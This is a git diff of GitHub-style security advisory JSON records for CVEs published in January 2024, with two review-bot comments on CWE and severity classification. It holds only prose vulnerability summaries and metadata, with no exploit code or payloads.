 "nvd_published_at": "2024-01-26T05:15:11Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-9fh5-955w-9jfh/GHSA-9fh5-955w-9jfh.json b/advisories/unreviewed/2024/01/GHSA-9fh5-955w-9jfh/GHSA-9fh5-955w-9jfh.json
new file mode 100644
index 0000000000000..24adb59076f3b
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-9fh5-955w-9jfh/GHSA-9fh5-955w-9jfh.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9fh5-955w-9jfh",
+ "modified": "2024-01-29T18:31:50Z",
+ "published": "2024-01-29T18:31:50Z",
+ "aliases": [
+ "CVE-2023-40546"
+ ],
+ "details": "A flaw was found in Shim when an error happened while creating a new ESL variable. If Shim fails to create the new variable, it tries to print an error message to the user; however, the number of parameters used by the logging function doesn't match the format string used by it, leading to a crash under certain circumstances.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-40546"
+ },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/security/cve/CVE-2023-40546"
+ },
+ {
+ "type": "WEB",
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2241796"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-476"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-29T17:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-9fhq-2p6p-h9p8/GHSA-9fhq-2p6p-h9p8.json b/advisories/unreviewed/2024/01/GHSA-9fhq-2p6p-h9p8/GHSA-9fhq-2p6p-h9p8.json
new file mode 100644
index 0000000000000..6f0b7d8fad8e3
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-9fhq-2p6p-h9p8/GHSA-9fhq-2p6p-h9p8.json
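Review bot: The single `"CWE-476"` entry in `cwe_ids` for CVE-2023-40546 classifies the symptom (a crash) rather than the cause the `details` text gives — a call whose argument count does not match its format string, which is closer to CWE-685. If this field is meant to mirror NVD's assignment verbatim it can stay as is; if CWEs are curated here, listing the root-cause weakness alongside CWE-476 would stop consumers filtering by weakness class from missing the record. Either way the `AV:L/…/A:H` vector and `"severity": "MODERATE"` are consistent with each other.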
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9fhq-2p6p-h9p8",
+ "modified": "2024-01-30T18:30:20Z",
+ "published": "2024-01-30T18:30:20Z",
+ "aliases": [
+ "CVE-2024-1035"
+ ],
+ "details": "A vulnerability has been found in openBI up to 1.0.8 and classified as critical. This vulnerability affects the function uploadIcon of the file /application/index/controller/Icon.php. The manipulation of the argument image leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-252310 is the identifier assigned to this vulnerability.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1035"
+ },
+ {
+ "type": "WEB",
+ "url": "https://note.zhaoj.in/share/AIbnbytIW9Bq"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.252310"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.252310"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-434"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-30T16:15:47Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-9fpx-vc83-vhpf/GHSA-9fpx-vc83-vhpf.json b/advisories/unreviewed/2024/01/GHSA-9fpx-vc83-vhpf/GHSA-9fpx-vc83-vhpf.json
new file mode 100644
index 0000000000000..ac3beb07efdd6
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-9fpx-vc83-vhpf/GHSA-9fpx-vc83-vhpf.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9fpx-vc83-vhpf",
+ "modified": "2024-02-06T21:30:24Z",
+ "published": "2024-01-29T21:30:27Z",
+ "aliases": [
+ "CVE-2024-23940"
+ ],
+ "details": "Trend Micro uiAirSupport, included in the Trend Micro Security 2023 family of consumer products, version 6.0.2092 and below is vulnerable to a DLL hijacking/proxying vulnerability, which if exploited could allow an attacker to impersonate and modify a library to execute code on the system and ultimately escalate privileges on an affected system.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23940"
+ },
+ {
+ "type": "WEB",
+ "url": "https://helpcenter.trendmicro.com/en-us/article/tmka-12134"
+ },
+ {
+ "type": "WEB",
+ "url": "https://helpcenter.trendmicro.com/ja-jp/article/tmka-12132"
+ },
+ {
+ "type": "WEB",
+ "url": "https://medium.com/@s1kr10s/av-when-a-friend-becomes-an-enemy-55f41aba42b1"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-427"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-29T19:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-9gf5-vf62-9578/GHSA-9gf5-vf62-9578.json b/advisories/unreviewed/2024/01/GHSA-9gf5-vf62-9578/GHSA-9gf5-vf62-9578.json
new file mode 100644
index 0000000000000..49720a41a6bd1
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-9gf5-vf62-9578/GHSA-9gf5-vf62-9578.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9gf5-vf62-9578",
+ "modified": "2024-01-31T21:31:03Z",
+ "published": "2024-01-31T21:31:03Z",
+ "aliases": [
+ "CVE-2024-22153"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Fahad Mahmood & Alexandre Faustino Stock Locations for WooCommerce allows Stored XSS.This issue affects Stock Locations for WooCommerce: from n/a through 2.5.9.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22153"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/stock-locations-for-woocommerce/wordpress-stock-locations-for-woocommerce-plugin-2-5-9-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-31T19:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-9gjc-h498-ff34/GHSA-9gjc-h498-ff34.json b/advisories/unreviewed/2024/01/GHSA-9gjc-h498-ff34/GHSA-9gjc-h498-ff34.json
index c0bea285ab02e..c9fa2e3e0be14 100644
--- a/advisories/unreviewed/2024/01/GHSA-9gjc-h498-ff34/GHSA-9gjc-h498-ff34.json
+++ b/advisories/unreviewed/2024/01/GHSA-9gjc-h498-ff34/GHSA-9gjc-h498-ff34.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-9gjc-h498-ff34",
- "modified": "2024-01-23T21:30:21Z",
+ "modified": "2024-01-30T18:30:19Z",
 "published": "2024-01-23T21:30:21Z",
 "aliases": [
 "CVE-2023-52094"
 ],
 "details": "An updater link following vulnerability in the Trend Micro Apex One agent could allow a local attacker to abuse the updater to delete an arbitrary folder, leading for a local privilege escalation on affected installations.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
@@ -29,9 +32,9 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-59"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-23T21:15:09Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-9gmp-mjhc-r22w/GHSA-9gmp-mjhc-r22w.json b/advisories/unreviewed/2024/01/GHSA-9gmp-mjhc-r22w/GHSA-9gmp-mjhc-r22w.json
new file mode 100644
index 0000000000000..e806ec1026355
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-9gmp-mjhc-r22w/GHSA-9gmp-mjhc-r22w.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9gmp-mjhc-r22w",
+ "modified": "2024-02-03T03:30:27Z",
+ "published": "2024-01-29T15:30:29Z",
+ "aliases": [
+ "CVE-2023-5943"
+ ],
+ "details": "The Wp-Adv-Quiz WordPress plugin before 1.0.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5943"
+ },
+ {
+ "type": "WEB",
+ "url": "https://wpscan.com/vulnerability/18fbe9d5-4829-450b-988c-8ba4becd032a/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-29T15:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-9gwq-8vvr-p65j/GHSA-9gwq-8vvr-p65j.json b/advisories/unreviewed/2024/01/GHSA-9gwq-8vvr-p65j/GHSA-9gwq-8vvr-p65j.json
index e3833a13116d3..a3c820c0d8956 100644
--- a/advisories/unreviewed/2024/01/GHSA-9gwq-8vvr-p65j/GHSA-9gwq-8vvr-p65j.json
+++ b/advisories/unreviewed/2024/01/GHSA-9gwq-8vvr-p65j/GHSA-9gwq-8vvr-p65j.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-9gwq-8vvr-p65j",
- "modified": "2024-01-23T21:30:21Z",
+ "modified": "2024-02-01T21:30:30Z",
 "published": "2024-01-23T21:30:21Z",
 "aliases": [
 "CVE-2023-51200"
 ],
 "details": "An issue in the default configurations of ROS2 Foxy Fitzroy ROS_VERSION=2 and ROS_PYTHON_VERSION=3 allows unauthenticated attackers to authenticate using default credentials.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
@@ -25,9 +28,9 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-798"
 ],
- "severity": null,
+ "severity": "CRITICAL",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-23T21:15:09Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-9h4j-w5f8-xjpc/GHSA-9h4j-w5f8-xjpc.json b/advisories/unreviewed/2024/01/GHSA-9h4j-w5f8-xjpc/GHSA-9h4j-w5f8-xjpc.json
new file mode 100644
index 0000000000000..52e8395b25c79
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-9h4j-w5f8-xjpc/GHSA-9h4j-w5f8-xjpc.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9h4j-w5f8-xjpc",
+ "modified": "2024-01-29T15:30:30Z",
+ "published": "2024-01-29T15:30:30Z",
+ "aliases": [
+ "CVE-2024-1003"
+ ],
+ "details": "A vulnerability, which was classified as critical, has been found in Totolink N200RE 9.3.5u.6139_B20201216. Affected by this issue is the function setLanguageCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument lang leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252272. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1003"
+ },
+ {
+ "type": "WEB",
+ "url": "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setLanguageCfg-72357294db1e4f8096b29d3f2592d1fc?pvs=4"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.252272"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.252272"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-121"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-29T15:15:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-9m57-xv2x-rj9v/GHSA-9m57-xv2x-rj9v.json b/advisories/unreviewed/2024/01/GHSA-9m57-xv2x-rj9v/GHSA-9m57-xv2x-rj9v.json
new file mode 100644
index 0000000000000..ddf3e4b74eb0e
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-9m57-xv2x-rj9v/GHSA-9m57-xv2x-rj9v.json
@@ -0,0 +1,50 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9m57-xv2x-rj9v",
+ "modified": "2024-02-05T21:30:31Z",
+ "published": "2024-01-31T00:30:18Z",
+ "aliases": [
+ "CVE-2024-1077"
+ ],
+ "details": "Use after free in Network in Google Chrome prior to 121.0.6167.139 allowed a remote attacker to potentially exploit heap corruption via a malicious file. (Chromium security severity: High)",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1077"
+ },
+ {
+ "type": "WEB",
+ "url": "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_30.html"
+ },
+ {
+ "type": "WEB",
+ "url": "https://crbug.com/1511085"
+ },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NEUXJY3YC3VGIJW2AOHL4NZ7ZK7BRYWY/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XCVKRHRWPMITSVFBHQBSNXOVJAKT547Q/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-416"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-30T22:15:53Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-9m6f-83hx-8wwr/GHSA-9m6f-83hx-8wwr.json b/advisories/unreviewed/2024/01/GHSA-9m6f-83hx-8wwr/GHSA-9m6f-83hx-8wwr.json
new file mode 100644
index 0000000000000..27264e7155dc8
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-9m6f-83hx-8wwr/GHSA-9m6f-83hx-8wwr.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9m6f-83hx-8wwr",
+ "modified": "2024-01-31T21:31:03Z",
+ "published": "2024-01-31T21:31:03Z",
+ "aliases": [
+ "CVE-2024-1111"
+ ],
+ "details": "A vulnerability, which was classified as problematic, has been found in SourceCodester QR Code Login System 1.0. Affected by this issue is some unknown functionality of the file add-user.php. The manipulation of the argument qr-code leads to cross site scripting. The attack may be launched remotely. VDB-252470 is the identifier assigned to this vulnerability.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1111"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.252470"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.252470"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-31T19:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-9mw7-8x3h-gcqc/GHSA-9mw7-8x3h-gcqc.json b/advisories/unreviewed/2024/01/GHSA-9mw7-8x3h-gcqc/GHSA-9mw7-8x3h-gcqc.json
index 61c807e1bec18..803d3936b321d 100644
--- a/advisories/unreviewed/2024/01/GHSA-9mw7-8x3h-gcqc/GHSA-9mw7-8x3h-gcqc.json
+++ b/advisories/unreviewed/2024/01/GHSA-9mw7-8x3h-gcqc/GHSA-9mw7-8x3h-gcqc.json
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-9mw7-8x3h-gcqc", - "modified": "2024-01-16T18:31:09Z", + "modified": "2024-01-30T15:30:20Z", "published": "2024-01-16T18:31:09Z", "aliases": [ "CVE-2023-3771" ], "details": "The T1 WordPress theme through 19.0 is vulnerable to unauthenticated open redirect with which any attacker and redirect users to arbitrary websites.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-601" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-16T16:15:11Z" diff --git a/advisories/unreviewed/2024/01/GHSA-9mx6-23q4-mcch/GHSA-9mx6-23q4-mcch.json b/advisories/unreviewed/2024/01/GHSA-9mx6-23q4-mcch/GHSA-9mx6-23q4-mcch.json index af71e3edef933..989fda3cc67ab 100644 --- a/advisories/unreviewed/2024/01/GHSA-9mx6-23q4-mcch/GHSA-9mx6-23q4-mcch.json +++ b/advisories/unreviewed/2024/01/GHSA-9mx6-23q4-mcch/GHSA-9mx6-23q4-mcch.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-9mx6-23q4-mcch", - "modified": "2024-01-27T00:31:23Z", + "modified": "2024-02-01T06:31:04Z", "published": "2024-01-27T00:31:23Z", "aliases": [ "CVE-2023-52187" diff --git a/advisories/unreviewed/2024/01/GHSA-9p23-87ch-pcgg/GHSA-9p23-87ch-pcgg.json b/advisories/unreviewed/2024/01/GHSA-9p23-87ch-pcgg/GHSA-9p23-87ch-pcgg.json index 85c48b8b738ae..48f5413270b94 100644 --- a/advisories/unreviewed/2024/01/GHSA-9p23-87ch-pcgg/GHSA-9p23-87ch-pcgg.json +++ b/advisories/unreviewed/2024/01/GHSA-9p23-87ch-pcgg/GHSA-9p23-87ch-pcgg.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-9p23-87ch-pcgg", - "modified": "2024-01-22T06:30:31Z", + "modified": "2024-01-29T15:30:24Z", "published": "2024-01-22T06:30:31Z", "aliases": [ "CVE-2024-22113" ], "details": "Open redirect vulnerability in Access analysis CGI An-Analyzer released in 2023 December 31 and earlier allows a remote unauthenticated attacker to redirect users to arbitrary websites and conduct phishing attacks via a specially crafted URL.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-601" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-22T05:15:09Z" diff --git a/advisories/unreviewed/2024/01/GHSA-9r3x-4hrp-2hgr/GHSA-9r3x-4hrp-2hgr.json b/advisories/unreviewed/2024/01/GHSA-9r3x-4hrp-2hgr/GHSA-9r3x-4hrp-2hgr.json new file mode 100644 index 0000000000000..d5156aba2cdd4 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-9r3x-4hrp-2hgr/GHSA-9r3x-4hrp-2hgr.json 
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9r3x-4hrp-2hgr",
+ "modified": "2024-01-30T00:30:29Z",
+ "published": "2024-01-30T00:30:29Z",
+ "aliases": [
+ "CVE-2024-1020"
+ ],
+ "details": "A vulnerability classified as problematic was found in Rebuild up to 3.5.5. Affected by this vulnerability is the function getStorageFile of the file /filex/proxy-download. The manipulation of the argument url leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252289 was assigned to this vulnerability.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1020"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.252289"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.252289"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.yuque.com/mailemonyeyongjuan/tha8tr/gdd3hiwz8uo6ylab"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-29T22:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-9rf9-hjjr-q4r4/GHSA-9rf9-hjjr-q4r4.json b/advisories/unreviewed/2024/01/GHSA-9rf9-hjjr-q4r4/GHSA-9rf9-hjjr-q4r4.json
index e04f000c42e6c..179d7cfa7e8c2 100644
--- a/advisories/unreviewed/2024/01/GHSA-9rf9-hjjr-q4r4/GHSA-9rf9-hjjr-q4r4.json
+++ b/advisories/unreviewed/2024/01/GHSA-9rf9-hjjr-q4r4/GHSA-9rf9-hjjr-q4r4.json
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-9rf9-hjjr-q4r4", - "modified": "2024-01-25T21:32:15Z", + "modified": "2024-01-29T18:31:48Z", "published": "2024-01-25T21:32:15Z", "aliases": [ "CVE-2024-22635" ], "details": "WebCalendar v1.3.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component /WebCalendarvqsmnseug2/edit_entry.php.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-25T21:15:09Z" diff --git a/advisories/unreviewed/2024/01/GHSA-9v9h-cgj8-h64p/GHSA-9v9h-cgj8-h64p.json b/advisories/unreviewed/2024/01/GHSA-9v9h-cgj8-h64p/GHSA-9v9h-cgj8-h64p.json index dd437a7188cbc..cc218deb602cb 100644 --- a/advisories/unreviewed/2024/01/GHSA-9v9h-cgj8-h64p/GHSA-9v9h-cgj8-h64p.json +++ b/advisories/unreviewed/2024/01/GHSA-9v9h-cgj8-h64p/GHSA-9v9h-cgj8-h64p.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-9v9h-cgj8-h64p", - "modified": "2024-01-26T09:30:23Z", + "modified": "2024-02-02T18:30:29Z", "published": "2024-01-26T09:30:23Z", "aliases": [ "CVE-2024-0727" ], "details": "Issue summary: Processing a maliciously formatted PKCS12 file may lead OpenSSL\nto crash leading to a potential Denial of Service attack\n\nImpact summary: Applications loading files in the PKCS12 format from untrusted\nsources might terminate abruptly.\n\nA file in PKCS12 format can contain certificates and keys and may come from an\nuntrusted source. The PKCS12 specification allows certain fields to be NULL, but\nOpenSSL does not correctly check for this case. This can lead to a NULL pointer\ndereference that results in OpenSSL crashing. If an application processes PKCS12\nfiles from an untrusted source using the OpenSSL APIs then that application will\nbe vulnerable to this issue.\n\nOpenSSL APIs that are vulnerable to this are: PKCS12_parse(),\nPKCS12_unpack_p7data(), PKCS12_unpack_p7encdata(), PKCS12_unpack_authsafes()\nand PKCS12_newpass().\n\nWe have also fixed a similar issue in SMIME_write_PKCS7(). However since this\nfunction is related to writing data we do not consider it security significant.\n\nThe FIPS modules in 3.2, 3.1 and 3.0 are not affected by this issue.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -47,7 +50,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-26T09:15:07Z" diff --git a/advisories/unreviewed/2024/01/GHSA-9vm4-r3mm-m2cq/GHSA-9vm4-r3mm-m2cq.json b/advisories/unreviewed/2024/01/GHSA-9vm4-r3mm-m2cq/GHSA-9vm4-r3mm-m2cq.json index b41d2b4014371..bb54442f1598a 100644 --- a/advisories/unreviewed/2024/01/GHSA-9vm4-r3mm-m2cq/GHSA-9vm4-r3mm-m2cq.json +++ b/advisories/unreviewed/2024/01/GHSA-9vm4-r3mm-m2cq/GHSA-9vm4-r3mm-m2cq.json 
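Review bot: The second hunk of GHSA-9v9h-cgj8-h64p fills in `"severity": "MODERATE"` but leaves `"cwe_ids": [ ]` empty, even though the details text in the first hunk states the defect is a NULL pointer dereference, which maps directly to CWE-476. The other records in this commit that gain a severity receive a CWE in the same sync, so an empty list here probably means the upstream record carried no weakness data at that time; a follow-up resync or a manual `"CWE-476"` entry would bring this record in line. The vector `AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H` is consistent with MODERATE, so the severity itself looks right.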
@@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20977" }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240201-0003/" + }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2024.html" diff --git a/advisories/unreviewed/2024/01/GHSA-9vpc-ch84-fc8h/GHSA-9vpc-ch84-fc8h.json b/advisories/unreviewed/2024/01/GHSA-9vpc-ch84-fc8h/GHSA-9vpc-ch84-fc8h.json index a228792fbbce1..66912929bd541 100644 --- a/advisories/unreviewed/2024/01/GHSA-9vpc-ch84-fc8h/GHSA-9vpc-ch84-fc8h.json +++ b/advisories/unreviewed/2024/01/GHSA-9vpc-ch84-fc8h/GHSA-9vpc-ch84-fc8h.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-9vpc-ch84-fc8h", - "modified": "2024-01-24T21:30:33Z", + "modified": "2024-02-01T18:31:07Z", "published": "2024-01-24T21:30:33Z", "aliases": [ "CVE-2021-42147" ], "details": "Buffer over-read vulnerability in the dtls_sha256_update function in Contiki-NG tinyDTLS through master branch 53a0d97 allows remote attackers to cause a denial of service via crafted data packet.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-125" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T19:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-9w3h-593p-q56r/GHSA-9w3h-593p-q56r.json b/advisories/unreviewed/2024/01/GHSA-9w3h-593p-q56r/GHSA-9w3h-593p-q56r.json new file mode 100644 index 0000000000000..f2fbf562159ef --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-9w3h-593p-q56r/GHSA-9w3h-593p-q56r.json 
@@ -0,0 +1,51 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9w3h-593p-q56r",
+ "modified": "2024-01-29T12:30:20Z",
+ "published": "2024-01-29T12:30:20Z",
+ "aliases": [
+ "CVE-2023-5378"
+ ],
